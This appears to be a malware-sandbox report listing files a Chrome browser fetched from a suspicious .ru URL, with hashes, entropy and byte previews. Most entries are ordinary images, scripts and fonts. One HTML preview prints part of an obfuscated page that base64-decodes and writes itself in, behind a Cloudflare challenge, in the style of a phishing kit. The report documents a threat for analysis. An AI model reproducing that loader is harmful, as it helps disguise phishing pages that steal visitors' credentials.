                                                                                                                          Preview:.PNG........IHDR.............L\......IDATx..}..\Wu.Y.}....Z..l.Y..|..a..@.L..6aX....q.d...v..;....!.2$.l.;...!l..-.m..[.%.%uU.w.9g.{.V.F.v...:......W..s.Y.s.33.QZ............TWG../}..=.d.%...Y...F..8...R.i/..d....!1..@@..-.....>p........TL.G.....>..i/......v=8.h...Wv.z.{/............Z.{\O.e.H>.lP!0.42..]......."m..7...!...[.....u".....L........7......?..*(;.k.f...5.V.^_:h.. "...!.f&2.. ...E../]...Rw6..&....q...?...@..Q.....29...D..}.....~V.K...D..m.#'.g.;...,9.....n}.>u>....#_.tq .......L...N...Z...,.v7..Z.rD...O...w.?.c..t..2.....B..*.h..'!..nr(f.f..,.......g...E.....E._.Z.+.A.k....1...w..J.C....Q00M.T...%R.%...Dq....G...v^....b.Z.*".n..Nb... ..h.."-.ZGt.......<...+..O.....?.....zh..u..]/4M. .l'.OZ......... z_....|..4...86....y..GW.;^..}..*......?..T....$......XWy.XO...7.!.....e...d9.......>8J.e.)G..n.......@.).e5....W;.f....i..u.z..i. S..d..kD.C].3..y.j.p......@V......%.....0#"...$1Z.q..`..%.j..D......&.....`.^..q..}..*.t...M5.P..7...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5175
                                                                                                                          Entropy (8bit):7.891663416397087
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yEmfSbpGw+3p1oBOTZQlA9MI74RPHZvzAi/ilOhbKSz2N9WxpIC42B:y7fSbp23p1ReleMI74ZZLp/cOhbPMcxt
                                                                                                                          MD5:723E3219FEDB83BA2194D19879F3FC56
                                                                                                                          SHA1:F67FF5F9FA2D1B34909F19C953649CBFA209C1CF
                                                                                                                          SHA-256:A2D051DC1B4A25F82773FBA40A148B21E24BAE4A6BCD93A76F750BACAE1C6BBC
                                                                                                                          SHA-512:B291BEB2E4FF79C9BBD0328B892F19D19F68C353BEF825307A629E9ABF48B0AF002119B3A85E9A7257602D4F34BE4A2A0814DEAFD9CE5EFA35697EDC39FC43A5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA4R_QY_jWM4psKCppaabuXLr6uHjmT8p8DHLe7zlxgQhMhGXlyUAf7OUlRaZD0LXikMxTybgvRbG1HsedWOw_qSDAE7Ipm-6OfTAePeERiks09k6k-s-PD_Xs_tthF-q7_DPoOyp4Zv6taXhVz6NiIW5Ma3eapxc3I0OnxkhpGvNdVsOC4hM9P9vnNScmNCX1XUa5sb&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=101b83b365ac88f4
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..)..@.(..M*4i.?.x^..g....|.eX..&f@PFH_S.d.. ...3MX...l........2.......q...I*..*;avH3&q..`u..qY.|.f.W_...QyT...BJ...p.$...2?:..$.]LKl..........g.}.k.&..c"."U.t.s.8...~....a......{.p..\.s.>.s...8W.}..-..$.......e .6E..S.@N>_..9....I3.RX.$.?..p9.F3...c.Ya.fT................,~h..4g.e.U.?#.$.....0..].Pz......=...1!.*....@.0@.../.....6..+ZT.O.".T6.6.......>..q^tV.Y
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 98 x 90, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11174
                                                                                                                          Entropy (8bit):7.97758318268209
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:b4JEM/GnDNmhq6mokMiqF/RhAUYaYL39w/RA1A4m63ux+9Tyv7RyRJgBHWHOYa7z:b4b4ghdiqFJyVpr9A63p9TG0RCZWH/K
                                                                                                                          MD5:A4741C6089E163F0E5C0CDB2C698A03E
                                                                                                                          SHA1:03B190C8D9350802CBABBCCD2757CFF1FB7115F0
                                                                                                                          SHA-256:C9685B413894B0647B42EDF9CAC1FC0B2ED044C1FE238D843B9CA3D29DB1B805
                                                                                                                          SHA-512:8F16410EDBC8893D9982CCAA1F2BA73BB1E7189B8101CE8EF3167D4663E5580A0BD2462295052A5DD86FA83AB3A0C4ED889204052951F8C6FA71E564D3EDCAFB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...b...Z...........+mIDATx..O.a.A.3.....@....YY.5`......#B...|...)F3S..8..H._.......N......v..i..k{D..r..wKhO...V*$..XD..(..*.4]8......t...Q..f!C.{...o.:.sNJ!.~R.....GFG.$.o.a..m...S.a...("..uu1....h......V...).....V...+....@rd9b.. ........5..7.]...........,CD./.......K.; ......v......H..`..$.p.E.I/.{....5....`..........O_...H.c.."G.Jp}LB.....OU.$..%....=..+..P` .....vR..^.._...a. ..vX.LIH..-..F..x.?......bRr..@.1....b...`#.L".........|....M.8$....IV.9s...;.WL....Q......8..h.....HIje.....a{.......:\...U.."...AYs.f.:.?RU.C5.,......Q.j..y...Nx.J....1.>.>-R.L.>.q?.H;.Z`.o...}...sN....k.........P.&>w*.0".u.$.l.W2.q.=I.H......2.......I.H.x..> [.,.t7..$$....W.`..D..#)....*...sfv..A_.....{....cy-..H.x.U5...Ew`....JxB..\.o..|........)..?~..D.A/...y0.%.D.;...0.K..d.v......;..x6B...Hg^E.6..~....g...'-.5.].c.[C2.$A.......!..b.d..U..$w:/.$B. )..P....Hq..3.!.l}]y.....`..s>.7.t.P.s.%d..E{M.m.....$.%...v..W..T:-........... 0....D4a".K...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (7545), with CRLF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):20024
                                                                                                                          Entropy (8bit):5.877395835385639
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:R2wnu9V65Z+6eHR4+xeogKnu9V65Z+6eHR4+xeslrXlrZ:Q65Z+vRxG65Z+vRx/lrXlrZ
                                                                                                                          MD5:1CC7E0768444ADDB6B323D0321A856B2
                                                                                                                          SHA1:72D6ECF3770C424683AA02E66A7388DD65885066
                                                                                                                          SHA-256:83E7D6E7E895301A9555157660AAD3AF292E40CBB8D2B60809ABD50EC381E44D
                                                                                                                          SHA-512:ECC60D1C94234D57BDC77D0C22F4DD8CBABBC3A4742D67E99C5C1EAB908EC84403A83C2F987AD7B7A2E6C73EE8E677F6D13D46C291487771C6914D66FE72BB12
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://wv.itzraterbi.ru/xxABW/
                                                                                                                          Preview:<script>../* The road to success and the road to failure are almost exactly the same. */..if(atob("aHR0cHM6Ly9HeXI3Lml0enJhdGVyYmkucnUveHhBQlcv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGh
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):89501
                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1080, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20353
                                                                                                                          Entropy (8bit):6.370391808181913
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:JdVkb4M0L9cTSlH2BRcHStFMqdJBC5Tnn0YUM7:6bEtfoDY5Tck
                                                                                                                          MD5:AF05F4963AAABC6880D51E16BE1DA571
                                                                                                                          SHA1:96F3322258A2B18AF3CF1B6C0CD07A8C5D9D5904
                                                                                                                          SHA-256:2B7538E3F280FBEA2E137FE23A9B5001460B95EFFBA9591AED0F73E9BD04D828
                                                                                                                          SHA-512:FE9FE6D96DEF3420115DCBF044942A25D29A73C04A234A32B1C33F4C97FB87C078A0E7A68A5C15AFD5F745B79A11B520E0388540049D0B0A882ABC2CF553B088
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................8...."...........................................................................B..B.%.Q..............@...*....@@.....(........`."...........*........R....J ........*......P....*........@........@)......... ..............,. .......... ...............*".PT.....E..T@P.........T................A.....,RP...........................P....(..`.*......@...........................(...........`.@.....@.....&.. (.B..(... (.....!@..............B...D...(J..................b..........@.............@,.(.....R....M@ ...........*.....J.......@............R......@.....,.X*...*....).......... ................. ....`....X(.............A`....,U........... ..... ......PT........X....`X......D............P@.......@.........D.....(...........,....*(.......*.............@..........,....*.....,..... .(.,........X.B.*P..........(....................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):530
                                                                                                                          Entropy (8bit):7.2576396280117494
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUhUxzPKmghSn8nazyk+k8/OzxQcxNMvVb:bhUxzlvWkT8FcxK1
                                                                                                                          MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                                                                                          SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                                                                                          SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                                                                                          SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/audio_2x.png
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):16
                                                                                                                          Entropy (8bit):3.75
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:H0hCkY:UUkY
                                                                                                                          MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                                                                          SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                                                                          SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                                                                          SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl0PQNUS-a10hIFDVNaR8U=?alt=proto
                                                                                                                          Preview:CgkKBw1TWkfFGgA=
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):37393
                                                                                                                          Entropy (8bit):7.962374914838514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:aZRyrwPI2S+3Gw22XYR53cZq3vkBSLBSw4qS9r3pELTJMh:agwS+3iVZadMLBSw4p9r3qL+h
                                                                                                                          MD5:024F815353B342324C63318E0240956D
                                                                                                                          SHA1:95A94E400533E1054D48B6534EAFC8159DCC2C42
                                                                                                                          SHA-256:FD5B83AF812E5699D67493DE548A4D0239E80C565873E6A17AAA13B0B80176D8
                                                                                                                          SHA-512:D0BC53E359DD2DE381037F4BA7BB638A3B9393F4AF66B8610E6A78AE8D2CBE93C8E3364D9F75DFB6FD9AFA344C9963511B8D6DAFF2C7BB3E3A7B480A3AD417CC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....z.E...Fo..](O..O..3.....V(.I..G.Ci0......P.....{w_...+.d.#....>b\L.....j.h]X..l.ur........t.^.>ar...B.....P.'..{..7N....T.w.......|%....Y..!m.6?.d..g...'..5y1.NN...!y......e...n..Z.K.....bMB^.?.....u...px...?..\..o...`..9..N..u.]....,V.{N..T...@...>.. ..+..;.{.C...1\.1u...<VZu..2<..Q&Q.`..0Fr8.~.....eg4..yR. .P...s.\..u.N.......1...Q..0.....=;....M<..~..8P
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5175
                                                                                                                          Entropy (8bit):7.891663416397087
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yEmfSbpGw+3p1oBOTZQlA9MI74RPHZvzAi/ilOhbKSz2N9WxpIC42B:y7fSbp23p1ReleMI74ZZLp/cOhbPMcxt
                                                                                                                          MD5:723E3219FEDB83BA2194D19879F3FC56
                                                                                                                          SHA1:F67FF5F9FA2D1B34909F19C953649CBFA209C1CF
                                                                                                                          SHA-256:A2D051DC1B4A25F82773FBA40A148B21E24BAE4A6BCD93A76F750BACAE1C6BBC
                                                                                                                          SHA-512:B291BEB2E4FF79C9BBD0328B892F19D19F68C353BEF825307A629E9ABF48B0AF002119B3A85E9A7257602D4F34BE4A2A0814DEAFD9CE5EFA35697EDC39FC43A5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..)..@.(..M*4i.?.x^..g....|.eX..&f@PFH_S.d.. ...3MX...l........2.......q...I*..*;avH3&q..`u..qY.|.f.W_...QyT...BJ...p.$...2?:..$.]LKl..........g.}.k.&..c"."U.t.s.8...~....a......{.p..\.s.>.s...8W.}..-..$.......e .6E..S.@N>_..9....I3.RX.$.?..p9.F3...c.Ya.fT................,~h..4g.e.U.?#.$.....0..].Pz......=...1!.*....@.0@.../.....6..+ZT.O.".T6.6.......>..q^tV.Y
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):530
                                                                                                                          Entropy (8bit):7.2576396280117494
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUhUxzPKmghSn8nazyk+k8/OzxQcxNMvVb:bhUxzlvWkT8FcxK1
                                                                                                                          MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                                                                                          SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                                                                                          SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                                                                                          SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2228
                                                                                                                          Entropy (8bit):7.82817506159911
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):48316
                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):15344
                                                                                                                          Entropy (8bit):7.984625225844861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                          MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                          SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                          SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                          SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                          Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
